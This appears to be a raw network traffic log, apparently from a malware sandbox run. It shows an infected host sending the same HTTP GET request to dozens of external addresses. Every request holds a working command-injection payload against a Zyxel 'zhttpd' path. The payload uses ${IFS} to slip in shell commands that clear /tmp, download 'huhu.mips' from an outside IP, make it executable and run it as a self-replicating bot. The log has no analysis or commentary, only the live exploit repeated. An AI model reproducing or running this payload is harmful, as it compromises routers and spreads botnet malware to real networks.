                                                      Feb 2, 2024 06:36:13.076806068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9444192.168.2.144489265.25.114.216443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.076838017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9445192.168.2.145690617.77.75.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.076877117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9446192.168.2.145410413.76.82.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.076909065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9447192.168.2.143822852.242.1.58443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.076945066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9448192.168.2.144654892.58.92.218443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.077076912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9449192.168.2.145716290.60.16.181443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.077114105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9450192.168.2.1459682149.94.2.36443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.077145100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9451192.168.2.14332369.140.160.60443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.077167988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9452192.168.2.1448726103.105.141.242443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.077195883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9453192.168.2.1444160155.93.103.59443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.077243090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9454192.168.2.1457210220.201.227.170443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.077301979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9455192.168.2.144069492.184.27.156443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.077325106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9456192.168.2.14349505.20.64.63443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.077382088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9457192.168.2.1447324149.160.232.116443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.080538988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9458192.168.2.145506474.51.232.31443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.081080914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9459192.168.2.143584894.84.66.219443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.081111908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9460192.168.2.143382482.35.113.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.081166983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9461192.168.2.1459098203.250.240.104443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.081221104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9462192.168.2.1456558174.245.37.122443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.081247091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9463192.168.2.144598690.0.92.8443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.081295013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9464192.168.2.1438808172.250.187.140443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.081322908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9465192.168.2.145569865.90.2.207443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.081370115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9466192.168.2.1456918198.141.53.103443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.081434011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9467192.168.2.1456812104.126.186.75443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.081465006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9468192.168.2.145791223.89.224.43443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.077673912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9469192.168.2.1438282132.86.185.171443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.077786922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9470192.168.2.1456210175.41.95.146443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.077821016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9471192.168.2.144484850.152.136.61443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.077860117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9472192.168.2.1456734191.246.129.67443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.077924013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9473192.168.2.1455458194.160.212.27443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.077951908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9474192.168.2.1458790137.60.252.10443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.078001022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9475192.168.2.1460180148.16.228.252443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.078046083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9476192.168.2.143432636.119.239.192443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.078094006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9477192.168.2.1450026148.146.232.5443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.078116894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9478192.168.2.144515295.91.242.215443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.078167915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9479192.168.2.1439908150.210.132.55443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.078205109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9480192.168.2.1452196217.121.29.150443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.078262091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9481192.168.2.143848014.247.82.218443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.078284979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9482192.168.2.143709662.213.91.77443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.078320026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9483192.168.2.1454876218.112.208.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.078371048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9484192.168.2.145345217.118.193.253443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.078412056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9485192.168.2.143741298.93.66.136443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.078459024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9486192.168.2.14361482.103.34.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.078491926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9487192.168.2.145351235.46.78.26443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.078532934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9488192.168.2.145251054.39.117.220443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.078562975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9489192.168.2.1452432123.48.37.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.078612089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9490192.168.2.144818690.52.197.67443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.078646898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9491192.168.2.1440826183.118.118.119443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.078681946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9492192.168.2.145210899.252.73.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.078727961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9493192.168.2.1436124126.43.132.225443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.078761101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9494192.168.2.1460838119.119.138.49443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.078798056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9495192.168.2.143782069.89.31.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.078836918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9496192.168.2.1457528185.151.19.116443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.078892946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9497192.168.2.1446054222.90.192.253443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.078921080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9498192.168.2.143393620.191.49.197443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.078963041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9499192.168.2.1455938182.135.14.88443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.079004049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9500192.168.2.1434726222.196.69.128443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.079051018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9501192.168.2.14585362.130.182.118443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.079104900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9502192.168.2.1440852106.154.5.194443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.079128981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9503192.168.2.1441408112.43.128.161443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.079179049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9504192.168.2.144429688.86.170.207443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.079212904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9505192.168.2.143809862.217.4.66443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.079268932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9506192.168.2.144490643.25.160.4443
                                                      TimestampBytes transferredDirectionData
